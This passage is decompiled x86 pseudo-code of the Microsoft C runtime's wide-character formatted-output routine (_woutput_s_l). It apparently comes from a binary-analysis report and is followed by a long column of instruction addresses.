                            																		 *(__ebp - 0x470) = __dl;
                            																		 *((char*)(__ebp - 0x46f)) = 0;
                            																		__ecx = __ebp - 0x40;
                            																		__eax = E0040D3B0(__ebp - 0x40);
                            																		__ecx = __ebp - 0x40;
                            																		E0040D3B0(__ebp - 0x40) =  *__eax;
                            																		__ecx =  *(__ebp - 0x448 + 0xac);
                            																		__edx = __ebp - 0x470;
                            																		__eax = __ebp - 0x448;
                            																		__eax = E00419150(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448);
                            																		__eflags = __eax;
                            																		if(__eax < 0) {
                            																			 *(__ebp - 0x28) = 1;
                            																		}
                            																	}
                            																	__edx = __ebp - 0x448;
                            																	 *(__ebp - 4) = __ebp - 0x448;
                            																	 *(__ebp - 0x24) = 1;
                            																	while(1) {
                            																		L187:
                            																		__eflags =  *(_t674 - 0x28);
                            																		if( *(_t674 - 0x28) != 0) {
                            																			goto L212;
                            																		}
                            																		goto L188;
                            																	}
                            																case 7:
                            																	L141:
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																	 *((intOrPtr*)(__ebp - 8)) = 0xa;
                            																	L150:
                            																	__eflags =  *(_t674 - 0x10) & 0x00008000;
                            																	if(( *(_t674 - 0x10) & 0x00008000) == 0) {
                            																		_t623 =  *(_t674 - 0x10) & 0x00001000;
                            																		__eflags = _t623;
                            																		if(_t623 == 0) {
                            																			__eflags =  *(_t674 - 0x10) & 0x00000020;
                            																			if(( *(_t674 - 0x10) & 0x00000020) == 0) {
                            																				_t625 =  *(_t674 - 0x10) & 0x00000040;
                            																				__eflags = _t625;
                            																				if(_t625 == 0) {
                            																					_t483 = E0041C290(_t674 + 0x14);
                            																					_t676 = _t676 + 4;
                            																					__eflags = 0;
                            																					 *(_t674 - 0x4a0) = _t483;
                            																					 *(_t674 - 0x49c) = 0;
                            																				} else {
                            																					_t556 = E0041C290(_t674 + 0x14);
                            																					_t676 = _t676 + 4;
                            																					asm("cdq");
                            																					 *(_t674 - 0x4a0) = _t556;
                            																					 *(_t674 - 0x49c) = _t625;
                            																				}
                            																			} else {
                            																				_t671 =  *(_t674 - 0x10) & 0x00000040;
                            																				__eflags = _t671;
                            																				if(_t671 == 0) {
                            																					_t557 = E0041C290(_t674 + 0x14);
                            																					_t676 = _t676 + 4;
                            																					asm("cdq");
                            																					 *(_t674 - 0x4a0) = _t557 & 0x0000ffff;
                            																					 *(_t674 - 0x49c) = _t671;
                            																				} else {
                            																					_t560 = E0041C290(_t674 + 0x14);
                            																					_t676 = _t676 + 4;
                            																					asm("cdq");
                            																					 *(_t674 - 0x4a0) = _t560;
                            																					 *(_t674 - 0x49c) = _t671;
                            																				}
                            																			}
                            																		} else {
                            																			_t563 = E0041C2B0(_t674 + 0x14);
                            																			_t676 = _t676 + 4;
                            																			 *(_t674 - 0x4a0) = _t563;
                            																			 *(_t674 - 0x49c) = _t623;
                            																		}
                            																	} else {
                            																		_t564 = E0041C2B0(_t674 + 0x14);
                            																		_t676 = _t676 + 4;
                            																		 *(_t674 - 0x4a0) = _t564;
                            																		 *(_t674 - 0x49c) = _t621;
                            																	}
                            																	__eflags =  *(_t674 - 0x10) & 0x00000040;
                            																	if(( *(_t674 - 0x10) & 0x00000040) == 0) {
                            																		goto L167;
                            																	}
                            																case 8:
                            																	L106:
                            																	__eax = __ebp + 0x14;
                            																	 *(__ebp - 0x484) = E0041C290(__ebp + 0x14);
                            																	__eax = E00420F80();
                            																	__eflags = __eax;
                            																	if(__eax != 0) {
                            																		L116:
                            																		__ecx =  *(__ebp - 0x10);
                            																		__ecx =  *(__ebp - 0x10) & 0x00000020;
                            																		__eflags = __ecx;
                            																		if(__ecx == 0) {
                            																			__ecx =  *(__ebp - 0x484);
                            																			__edx =  *(__ebp - 0x44c);
                            																			 *__ecx =  *(__ebp - 0x44c);
                            																		} else {
                            																			__edx =  *(__ebp - 0x484);
                            																			__ax =  *(__ebp - 0x44c);
                            																			 *( *(__ebp - 0x484)) = __ax;
                            																		}
                            																		 *(__ebp - 0x28) = 1;
                            																		while(1) {
                            																			L187:
                            																			__eflags =  *(_t674 - 0x28);
                            																			if( *(_t674 - 0x28) != 0) {
                            																				goto L212;
                            																			}
                            																			goto L188;
                            																		}
                            																	}
                            																	L107:
                            																	__ecx = 0;
                            																	__eflags = 0;
                            																	if(0 == 0) {
                            																		 *(__ebp - 0x4f4) = 0;
                            																	} else {
                            																		 *(__ebp - 0x4f4) = 1;
                            																	}
                            																	__edx =  *(__ebp - 0x4f4);
                            																	 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
                            																	__eflags =  *(__ebp - 0x488);
                            																	if( *(__ebp - 0x488) == 0) {
                            																		_push(L"(\"\'n\' format specifier disabled\", 0)");
                            																		_push(0);
                            																		_push(0x695);
                            																		_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																		_push(2);
                            																		__eax = L0040E1A0();
                            																		__esp = __esp + 0x14;
                            																		__eflags = __eax - 1;
                            																		if(__eax == 1) {
                            																			asm("int3");
                            																		}
                            																	}
                            																	__eflags =  *(__ebp - 0x488);
                            																	if( *(__ebp - 0x488) != 0) {
                            																		L115:
                            																		while(1) {
                            																			L187:
                            																			__eflags =  *(_t674 - 0x28);
                            																			if( *(_t674 - 0x28) != 0) {
                            																				goto L212;
                            																			}
                            																			goto L188;
                            																		}
                            																	} else {
                            																		L114:
                            																		 *((intOrPtr*)(L0040EC70(__ecx))) = 0x16;
                            																		__eax = E00411A50(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
                            																		 *(__ebp - 0x4cc) = 0xffffffff;
                            																		__ecx = __ebp - 0x40;
                            																		__eax = E0040D380(__ecx);
                            																		__eax =  *(__ebp - 0x4cc);
                            																		goto L225;
                            																	}
                            																case 9:
                            																	goto L0;
                            																case 0xa:
                            																	L143:
                            																	 *(__ebp - 0x30) = 8;
                            																	goto L144;
                            																case 0xb:
                            																	L84:
                            																	__eflags =  *(__ebp - 0x30) - 0xffffffff;
                            																	if( *(__ebp - 0x30) != 0xffffffff) {
                            																		__edx =  *(__ebp - 0x30);
                            																		 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
                            																	} else {
                            																		 *(__ebp - 0x4f0) = 0x7fffffff;
                            																	}
                            																	__eax =  *(__ebp - 0x4f0);
                            																	 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
                            																	__ecx = __ebp + 0x14;
                            																	 *(__ebp - 4) = E0041C290(__ebp + 0x14);
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																	__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																	if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																		L98:
                            																		__eflags =  *(__ebp - 4);
                            																		if( *(__ebp - 4) == 0) {
                            																			__ecx =  *0x60b4f4; // 0x407414
                            																			 *(__ebp - 4) = __ecx;
                            																		}
                            																		 *(__ebp - 0xc) = 1;
                            																		__edx =  *(__ebp - 4);
                            																		 *(__ebp - 0x480) =  *(__ebp - 4);
                            																		while(1) {
                            																			L101:
                            																			__eax =  *(__ebp - 0x47c);
                            																			__ecx =  *(__ebp - 0x47c);
                            																			__ecx =  *(__ebp - 0x47c) - 1;
                            																			 *(__ebp - 0x47c) = __ecx;
                            																			__eflags =  *(__ebp - 0x47c);
                            																			if( *(__ebp - 0x47c) == 0) {
                            																				break;
                            																			}
                            																			L102:
                            																			__edx =  *(__ebp - 0x480);
                            																			__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
                            																			__eflags =  *( *(__ebp - 0x480)) & 0x0000ffff;
                            																			if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
                            																				break;
                            																			}
                            																			L103:
                            																			 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
                            																			 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
                            																		}
                            																		L104:
                            																		__edx =  *(__ebp - 0x480);
                            																		__edx =  *(__ebp - 0x480) -  *(__ebp - 4);
                            																		__eflags = __edx;
                            																		 *(__ebp - 0x24) = __edx;
                            																		goto L105;
                            																	} else {
                            																		L88:
                            																		__eflags =  *(__ebp - 4);
                            																		if( *(__ebp - 4) == 0) {
                            																			__eax =  *0x60b4f0; // 0x407424
                            																			 *(__ebp - 4) = __eax;
                            																		}
                            																		__ecx =  *(__ebp - 4);
                            																		 *(__ebp - 0x478) = __ecx;
                            																		 *(__ebp - 0x24) = 0;
                            																		while(1) {
                            																			L92:
                            																			__eax =  *(__ebp - 0x24);
                            																			__eflags =  *(__ebp - 0x24) -  *(__ebp - 0x47c);
                            																			if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
                            																				break;
                            																			}
                            																			L93:
                            																			__ecx =  *(__ebp - 0x478);
                            																			__edx =  *__ecx;
                            																			__eflags =  *__ecx;
                            																			if( *__ecx == 0) {
                            																				break;
                            																			}
                            																			L94:
                            																			__ecx = __ebp - 0x40;
                            																			E0040D3B0(__ebp - 0x40) =  *(__ebp - 0x478);
                            																			__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
                            																			__eax = E00419390( *( *(__ebp - 0x478)) & 0x000000ff,  *(__ebp - 0x478));
                            																			__eflags = __eax;
                            																			if(__eax != 0) {
                            																				__edx =  *(__ebp - 0x478);
                            																				__edx =  *(__ebp - 0x478) + 1;
                            																				__eflags = __edx;
                            																				 *(__ebp - 0x478) = __edx;
                            																			}
                            																			 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
                            																			 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
                            																			__edx =  *(__ebp - 0x24);
                            																			__edx =  *(__ebp - 0x24) + 1;
                            																			__eflags = __edx;
                            																			 *(__ebp - 0x24) = __edx;
                            																		}
                            																		L97:
                            																		L105:
                            																		while(1) {
                            																			L187:
                            																			__eflags =  *(_t674 - 0x28);
                            																			if( *(_t674 - 0x28) != 0) {
                            																				goto L212;
                            																			}
                            																			goto L188;
                            																		}
                            																	}
                            																case 0xc:
                            																	L142:
                            																	 *((intOrPtr*)(__ebp - 8)) = 0xa;
                            																	while(1) {
                            																		L150:
                            																		__eflags =  *(_t674 - 0x10) & 0x00008000;
                            																		if(( *(_t674 - 0x10) & 0x00008000) == 0) {
                            																			_t623 =  *(_t674 - 0x10) & 0x00001000;
                            																			__eflags = _t623;
                            																			if(_t623 == 0) {
                            																				__eflags =  *(_t674 - 0x10) & 0x00000020;
                            																				if(( *(_t674 - 0x10) & 0x00000020) == 0) {
                            																					_t625 =  *(_t674 - 0x10) & 0x00000040;
                            																					__eflags = _t625;
                            																					if(_t625 == 0) {
                            																						_t483 = E0041C290(_t674 + 0x14);
                            																						_t676 = _t676 + 4;
                            																						__eflags = 0;
                            																						 *(_t674 - 0x4a0) = _t483;
                            																						 *(_t674 - 0x49c) = 0;
                            																					} else {
                            																						_t556 = E0041C290(_t674 + 0x14);
                            																						_t676 = _t676 + 4;
                            																						asm("cdq");
                            																						 *(_t674 - 0x4a0) = _t556;
                            																						 *(_t674 - 0x49c) = _t625;
                            																					}
                            																				} else {
                            																					_t671 =  *(_t674 - 0x10) & 0x00000040;
                            																					__eflags = _t671;
                            																					if(_t671 == 0) {
                            																						_t557 = E0041C290(_t674 + 0x14);
                            																						_t676 = _t676 + 4;
                            																						asm("cdq");
                            																						 *(_t674 - 0x4a0) = _t557 & 0x0000ffff;
                            																						 *(_t674 - 0x49c) = _t671;
                            																					} else {
                            																						_t560 = E0041C290(_t674 + 0x14);
                            																						_t676 = _t676 + 4;
                            																						asm("cdq");
                            																						 *(_t674 - 0x4a0) = _t560;
                            																						 *(_t674 - 0x49c) = _t671;
                            																					}
                            																				}
                            																			} else {
                            																				_t563 = E0041C2B0(_t674 + 0x14);
                            																				_t676 = _t676 + 4;
                            																				 *(_t674 - 0x4a0) = _t563;
                            																				 *(_t674 - 0x49c) = _t623;
                            																			}
                            																		} else {
                            																			_t564 = E0041C2B0(_t674 + 0x14);
                            																			_t676 = _t676 + 4;
                            																			 *(_t674 - 0x4a0) = _t564;
                            																			 *(_t674 - 0x49c) = _t621;
                            																		}
                            																		__eflags =  *(_t674 - 0x10) & 0x00000040;
                            																		if(( *(_t674 - 0x10) & 0x00000040) == 0) {
                            																			goto L167;
                            																		}
                            																		goto L163;
                            																	}
                            																case 0xd:
                            																	L145:
                            																	 *(__ebp - 0x460) = 0x27;
                            																	L146:
                            																	 *((intOrPtr*)(__ebp - 8)) = 0x10;
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																	__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																	if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																		__edx = 0x30;
                            																		 *((short*)(__ebp - 0x14)) = __dx;
                            																		 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
                            																		__eflags =  *(__ebp - 0x460) + 0x51;
                            																		 *(__ebp - 0x12) = __ax;
                            																		 *(__ebp - 0x1c) = 2;
                            																	}
                            																	while(1) {
                            																		L150:
                            																		__eflags =  *(_t674 - 0x10) & 0x00008000;
                            																		if(( *(_t674 - 0x10) & 0x00008000) == 0) {
                            																			_t623 =  *(_t674 - 0x10) & 0x00001000;
                            																			__eflags = _t623;
                            																			if(_t623 == 0) {
                            																				__eflags =  *(_t674 - 0x10) & 0x00000020;
                            																				if(( *(_t674 - 0x10) & 0x00000020) == 0) {
                            																					_t625 =  *(_t674 - 0x10) & 0x00000040;
                            																					__eflags = _t625;
                            																					if(_t625 == 0) {
                            																						_t483 = E0041C290(_t674 + 0x14);
                            																						_t676 = _t676 + 4;
                            																						__eflags = 0;
                            																						 *(_t674 - 0x4a0) = _t483;
                            																						 *(_t674 - 0x49c) = 0;
                            																					} else {
                            																						_t556 = E0041C290(_t674 + 0x14);
                            																						_t676 = _t676 + 4;
                            																						asm("cdq");
                            																						 *(_t674 - 0x4a0) = _t556;
                            																						 *(_t674 - 0x49c) = _t625;
                            																					}
                            																				} else {
                            																					_t671 =  *(_t674 - 0x10) & 0x00000040;
                            																					__eflags = _t671;
                            																					if(_t671 == 0) {
                            																						_t557 = E0041C290(_t674 + 0x14);
                            																						_t676 = _t676 + 4;
                            																						asm("cdq");
                            																						 *(_t674 - 0x4a0) = _t557 & 0x0000ffff;
                            																						 *(_t674 - 0x49c) = _t671;
                            																					} else {
                            																						_t560 = E0041C290(_t674 + 0x14);
                            																						_t676 = _t676 + 4;
                            																						asm("cdq");
                            																						 *(_t674 - 0x4a0) = _t560;
                            																						 *(_t674 - 0x49c) = _t671;
                            																					}
                            																				}
                            																			} else {
                            																				_t563 = E0041C2B0(_t674 + 0x14);
                            																				_t676 = _t676 + 4;
                            																				 *(_t674 - 0x4a0) = _t563;
                            																				 *(_t674 - 0x49c) = _t623;
                            																			}
                            																		} else {
                            																			_t564 = E0041C2B0(_t674 + 0x14);
                            																			_t676 = _t676 + 4;
                            																			 *(_t674 - 0x4a0) = _t564;
                            																			 *(_t674 - 0x49c) = _t621;
                            																		}
                            																		__eflags =  *(_t674 - 0x10) & 0x00000040;
                            																		if(( *(_t674 - 0x10) & 0x00000040) == 0) {
                            																			goto L167;
                            																		}
                            																		goto L163;
                            																	}
                            																case 0xe:
                            																	while(1) {
                            																		L187:
                            																		__eflags =  *(_t674 - 0x28);
                            																		if( *(_t674 - 0x28) != 0) {
                            																			goto L212;
                            																		}
                            																		goto L188;
                            																	}
                            															}
                            														case 8:
                            															L24:
                            															__ecx =  *(__ebp - 0x10);
                            															__ecx =  *(__ebp - 0x10) | 0x00000002;
                            															 *(__ebp - 0x10) = __ecx;
                            															goto L27;
                            														case 9:
                            															L25:
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            															goto L27;
                            														case 0xa:
                            															L23:
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
                            															goto L27;
                            														case 0xb:
                            															L22:
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            															goto L27;
                            														case 0xc:
                            															L26:
                            															__eax =  *(__ebp - 0x10);
                            															__eax =  *(__ebp - 0x10) | 0x00000008;
                            															__eflags = __eax;
                            															 *(__ebp - 0x10) = __eax;
                            															goto L27;
                            														case 0xd:
                            															L27:
                            															goto L214;
                            													}
                            												} else {
                            													_t642 = 0;
                            													if(0 == 0) {
                            														 *(_t674 - 0x4dc) = 0;
                            													} else {
                            														 *(_t674 - 0x4dc) = 1;
                            													}
                            													 *(_t674 - 0x46c) =  *(_t674 - 0x4dc);
                            													if( *(_t674 - 0x46c) == 0) {
                            														_push(L"(\"Incorrect format specifier\", 0)");
                            														_push(0);
                            														_push(0x460);
                            														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            														_push(2);
                            														_t517 = L0040E1A0();
                            														_t676 = _t676 + 0x14;
                            														if(_t517 == 1) {
                            															asm("int3");
                            														}
                            													}
                            													L14:
                            													if( *(_t674 - 0x46c) != 0) {
                            														goto L16;
                            													} else {
                            														 *((intOrPtr*)(L0040EC70(_t588))) = 0x16;
                            														E00411A50(_t565, _t588, _t672, _t673, L"(\"Incorrect format specifier\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
                            														 *(_t674 - 0x4c8) = 0xffffffff;
                            														E0040D380(_t674 - 0x40);
                            														_t502 =  *(_t674 - 0x4c8);
                            														L225:
                            														return E00416CA0(_t502, _t565,  *(_t674 - 0x48) ^ _t674, _t642, _t672, _t673);
                            													}
                            												}
                            											}
                            											L215:
                            											__eflags =  *(_t674 - 0x45c);
                            											if( *(_t674 - 0x45c) == 0) {
                            												L218:
                            												 *(_t674 - 0x4f8) = 1;
                            												L219:
                            												_t642 =  *(_t674 - 0x4f8);
                            												 *(_t674 - 0x4bc) =  *(_t674 - 0x4f8);
                            												__eflags =  *(_t674 - 0x4bc);
                            												if( *(_t674 - 0x4bc) == 0) {
                            													_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
                            													_push(0);
                            													_push(0x8f5);
                            													_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            													_push(2);
                            													_t507 = L0040E1A0();
                            													_t676 = _t676 + 0x14;
                            													__eflags = _t507 - 1;
                            													if(_t507 == 1) {
                            														asm("int3");
                            													}
                            												}
                            												__eflags =  *(_t674 - 0x4bc);
                            												if( *(_t674 - 0x4bc) != 0) {
                            													 *(_t674 - 0x4d4) =  *(_t674 - 0x44c);
                            													E0040D380(_t674 - 0x40);
                            													_t502 =  *(_t674 - 0x4d4);
                            												} else {
                            													 *((intOrPtr*)(L0040EC70(_t580))) = 0x16;
                            													E00411A50(_t565, _t580, _t672, _t673, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
                            													 *(_t674 - 0x4d0) = 0xffffffff;
                            													E0040D380(_t674 - 0x40);
                            													_t502 =  *(_t674 - 0x4d0);
                            												}
                            												goto L225;
                            											}
                            											L216:
                            											__eflags =  *(_t674 - 0x45c) - 7;
                            											if( *(_t674 - 0x45c) == 7) {
                            												goto L218;
                            											}
                            											L217:
                            											 *(_t674 - 0x4f8) = 0;
                            											goto L219;
                            										}
                            									}
                            									L184:
                            									__eflags =  *(_t674 - 0x24);
                            									if( *(_t674 - 0x24) == 0) {
                            										L186:
                            										 *((intOrPtr*)(_t674 - 4)) =  *((intOrPtr*)(_t674 - 4)) - 1;
                            										 *((char*)( *((intOrPtr*)(_t674 - 4)))) = 0x30;
                            										_t613 =  *(_t674 - 0x24) + 1;
                            										__eflags = _t613;
                            										 *(_t674 - 0x24) = _t613;
                            										goto L187;
                            									}
                            									L185:
                            									__eflags =  *((char*)( *((intOrPtr*)(_t674 - 4)))) - 0x30;
                            									if( *((char*)( *((intOrPtr*)(_t674 - 4)))) == 0x30) {
                            										goto L187;
                            									}
                            									goto L186;
                            								}
                            								L180:
                            								asm("cdq");
                            								_t632 =  *(_t674 - 0x4a8);
                            								 *(_t674 - 0x494) = E0041CE40(_t632,  *(_t674 - 0x4a4),  *(_t674 - 8), _t631) + 0x30;
                            								asm("cdq");
                            								 *(_t674 - 0x4a8) = E0041CDD0( *(_t674 - 0x4a8),  *(_t674 - 0x4a4),  *(_t674 - 8), _t632);
                            								 *(_t674 - 0x4a4) = _t632;
                            								__eflags =  *(_t674 - 0x494) - 0x39;
                            								if( *(_t674 - 0x494) > 0x39) {
                            									_t636 =  *(_t674 - 0x494) +  *((intOrPtr*)(_t674 - 0x460));
                            									__eflags = _t636;
                            									 *(_t674 - 0x494) = _t636;
                            								}
                            								 *((char*)( *((intOrPtr*)(_t674 - 4)))) =  *(_t674 - 0x494);
                            								 *((intOrPtr*)(_t674 - 4)) =  *((intOrPtr*)(_t674 - 4)) - 1;
                            								L178:
                            								_t631 =  *(_t674 - 0x30) - 1;
                            								 *(_t674 - 0x30) =  *(_t674 - 0x30) - 1;
                            								__eflags =  *(_t674 - 0x30);
                            								if( *(_t674 - 0x30) > 0) {
                            									goto L180;
                            								}
                            								goto L179;
                            							}
                            						}
                            						L165:
                            						__eflags =  *(_t674 - 0x4a0);
                            						if( *(_t674 - 0x4a0) >= 0) {
                            							goto L167;
                            						}
                            						goto L166;
                            						L167:
                            						 *(_t674 - 0x4a8) =  *(_t674 - 0x4a0);
                            						 *(_t674 - 0x4a4) =  *(_t674 - 0x49c);
                            						goto L168;
                            					}
                            				}
                            			}





























                            0x00423904
                            0x00423904
                            0x00423904
                            0x00423904
                            0x00423904
                            0x00423904
                            0x00423904
                            0x00423914
                            0x00423916
                            0x00423919
                            0x00423919
                            0x0042391f
                            0x0042391f
                            0x00423922
                            0x00423922
                            0x00423925
                            0x0042392a
                            0x0042394c
                            0x0042394c
                            0x00423952
                            0x00423974
                            0x00423977
                            0x004239be
                            0x004239be
                            0x004239c1
                            0x004239e2
                            0x004239e7
                            0x004239ea
                            0x004239ec
                            0x004239f2
                            0x004239c3
                            0x004239c7
                            0x004239cc
                            0x004239cf
                            0x004239d0
                            0x004239d6
                            0x004239d6
                            0x00423979
                            0x0042397c
                            0x0042397c
                            0x0042397f
                            0x004239a1
                            0x004239a6
                            0x004239ac
                            0x004239ad
                            0x004239b3
                            0x00423981
                            0x00423985
                            0x0042398a
                            0x0042398e
                            0x0042398f
                            0x00423995
                            0x00423995
                            0x004239b9
                            0x00423954
                            0x00423958
                            0x0042395d
                            0x00423960
                            0x00423966
                            0x00423966
                            0x0042392c
                            0x00423930
                            0x00423935
                            0x00423938
                            0x0042393e
                            0x0042393e
                            0x004239fb
                            0x004239fe
                            0x00000000
                            0x00000000
                            0x00423a00
                            0x00423a00
                            0x00423a07
                            0x00000000
                            0x00000000
                            0x00423a09
                            0x00423a09
                            0x00423a14
                            0x00423a22
                            0x00423a27
                            0x00423a2d
                            0x00423a3b
                            0x00423a58
                            0x00423a5b
                            0x00423a60
                            0x00423a65
                            0x00423a6b
                            0x00423a79
                            0x00423a79
                            0x00423a82
                            0x00423a82
                            0x00423a6b
                            0x00423a88
                            0x00423a8c
                            0x00423a9d
                            0x00423aa0
                            0x00423aa7
                            0x00423aa9
                            0x00423aa9
                            0x00423a8e
                            0x00423a8e
                            0x00423a8e
                            0x00423ab6
                            0x00423abc
                            0x00423abe
                            0x00423abe
                            0x00423acb
                            0x00423ace
                            0x00423ace
                            0x00423ad4
                            0x00423ad7
                            0x00423ada
                            0x00423adc
                            0x00000000
                            0x00000000
                            0x00423ade
                            0x00423ae4
                            0x00423aea
                            0x00423b67
                            0x00423b70
                            0x00423b79
                            0x00423b7f
                            0x00423b85
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00423bba
                            0x00423bbd
                            0x00423bc0
                            0x00423bc5
                            0x00423bca
                            0x00423be1
                            0x00423be4
                            0x00423bfb
                            0x00423bfe
                            0x00423c05
                            0x00423c09
                            0x00423c09
                            0x00423be6
                            0x00423beb
                            0x00423bef
                            0x00423bef
                            0x00423bcc
                            0x00423bd1
                            0x00423bd5
                            0x00423bd5
                            0x00423bca
                            0x00423c19
                            0x00423c22
                            0x00423c25
                            0x00423c3b
                            0x00423c40
                            0x00423c40
                            0x00423c56
                            0x00423c5b
                            0x00423c61
                            0x00423c64
                            0x00423c69
                            0x00423c6c
                            0x00423c82
                            0x00423c87
                            0x00423c87
                            0x00423c6c
                            0x00423c8a
                            0x00423c8e
                            0x00423d48
                            0x00423d5b
                            0x00423d60
                            0x00000000
                            0x00423c94
                            0x00423c94
                            0x00423c94
                            0x00423c98
                            0x00000000
                            0x00000000
                            0x00423c9e
                            0x00423ca1
                            0x00423caa
                            0x00423cb0
                            0x00423cb0
                            0x00423cbf
                            0x00423cc5
                            0x00423cc7
                            0x00000000
                            0x00000000
                            0x00423cc9
                            0x00423ccc
                            0x00423cf1
                            0x00423cf6
                            0x00423cf9
                            0x00423cff
                            0x00423d06
                            0x00423d14
                            0x00423d27
                            0x00423d2c
                            0x00423d3b
                            0x00000000
                            0x00423d3b
                            0x00423d08
                            0x00423d08
                            0x00000000
                            0x00423d08
                            0x00423d46
                            0x00423d63
                            0x00423d63
                            0x00423d6a
                            0x00423d6f
                            0x00423d72
                            0x00423d88
                            0x00423d8d
                            0x00423d8d
                            0x00423d72
                            0x00423d6a
                            0x00423d90
                            0x00423d90
                            0x00423d94
                            0x00423d9c
                            0x00423da1
                            0x00423da4
                            0x00423da4
                            0x00423dab
                            0x00423dab
                            0x00422f2b
                            0x00422f32
                            0x00422f3f
                            0x00422f44
                            0x00000000
                            0x00422f57
                            0x00422f61
                            0x00422f88
                            0x00422f6f
                            0x00422f80
                            0x00422f80
                            0x00422f61
                            0x00422f92
                            0x00422f98
                            0x00422fa4
                            0x00422fa7
                            0x00422fb5
                            0x00422fb8
                            0x00422fc5
                            0x0042306a
                            0x00423070
                            0x00423076
                            0x0042307d
                            0x00000000
                            0x00000000
                            0x00423083
                            0x00423089
                            0x00000000
                            0x00423090
                            0x00423090
                            0x004230aa
                            0x004230af
                            0x00000000
                            0x00000000
                            0x004230b7
                            0x004230b7
                            0x004230be
                            0x004230c1
                            0x004230c4
                            0x004230c7
                            0x004230ca
                            0x004230cd
                            0x004230d0
                            0x004230d7
                            0x004230de
                            0x00000000
                            0x00000000
                            0x004230ea
                            0x004230ea
                            0x004230f1
                            0x004230fd
                            0x00423100
                            0x00423106
                            0x0042310d
                            0x00000000
                            0x00000000
                            0x0042310f
                            0x00423115
                            0x00423115
                            0x0042311c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423160
                            0x00423160
                            0x00423167
                            0x0042316a
                            0x00423194
                            0x00423197
                            0x00423197
                            0x004231a1
                            0x004231a1
                            0x004231a5
                            0x0042316c
                            0x0042316c
                            0x00423178
                            0x0042317b
                            0x0042317f
                            0x00423181
                            0x00423184
                            0x00423184
                            0x00423187
                            0x0042318a
                            0x0042318d
                            0x0042318f
                            0x0042318f
                            0x00423192
                            0x004231a8
                            0x00000000
                            0x00000000
                            0x004231ad
                            0x004231ad
                            0x00000000
                            0x00000000
                            0x004231b9
                            0x004231b9
                            0x004231c0
                            0x004231c3
                            0x004231e3
                            0x004231e6
                            0x004231e6
                            0x004231f0
                            0x004231f0
                            0x004231f4
                            0x004231c5
                            0x004231c5
                            0x004231d1
                            0x004231d4
                            0x004231d8
                            0x004231da
                            0x004231da
                            0x004231e1
                            0x00000000
                            0x00000000
                            0x004231fc
                            0x004231fc
                            0x00423203
                            0x0042320f
                            0x00423212
                            0x00423218
                            0x0042321f
                            0x00423332
                            0x00000000
                            0x00423332
                            0x00423225
                            0x0042322b
                            0x0042322b
                            0x00423232
                            0x00000000
                            0x00423269
                            0x00423269
                            0x0042326c
                            0x0042326f
                            0x00423272
                            0x00423299
                            0x00423299
                            0x0042329c
                            0x0042329f
                            0x004232a2
                            0x004232c6
                            0x004232c6
                            0x004232c9
                            0x004232cc
                            0x004232cf
                            0x00423308
                            0x00423319
                            0x00000000
                            0x00423319
                            0x004232d1
                            0x004232d1
                            0x004232d4
                            0x004232d7
                            0x004232da
                            0x00000000
                            0x00000000
                            0x004232dc
                            0x004232dc
                            0x004232df
                            0x004232e2
                            0x004232e5
                            0x00000000
                            0x00000000
                            0x004232e7
                            0x004232e7
                            0x004232ea
                            0x004232ed
                            0x004232f0
                            0x00000000
                            0x00000000
                            0x004232f2
                            0x004232f2
                            0x004232f5
                            0x004232f8
                            0x004232fb
                            0x00000000
                            0x00000000
                            0x004232fd
                            0x004232fd
                            0x00423300
                            0x00423303
                            0x00423306
                            0x0042330a
                            0x00000000
                            0x0042330a
                            0x00000000
                            0x00423306
                            0x004232a4
                            0x004232a4
                            0x004232a7
                            0x004232ab
                            0x004232ae
                            0x00000000
                            0x004232b0
                            0x004232b3
                            0x004232b6
                            0x004232bc
                            0x004232c1
                            0x00000000
                            0x004232c1
                            0x004232ae
                            0x00423274
                            0x00423274
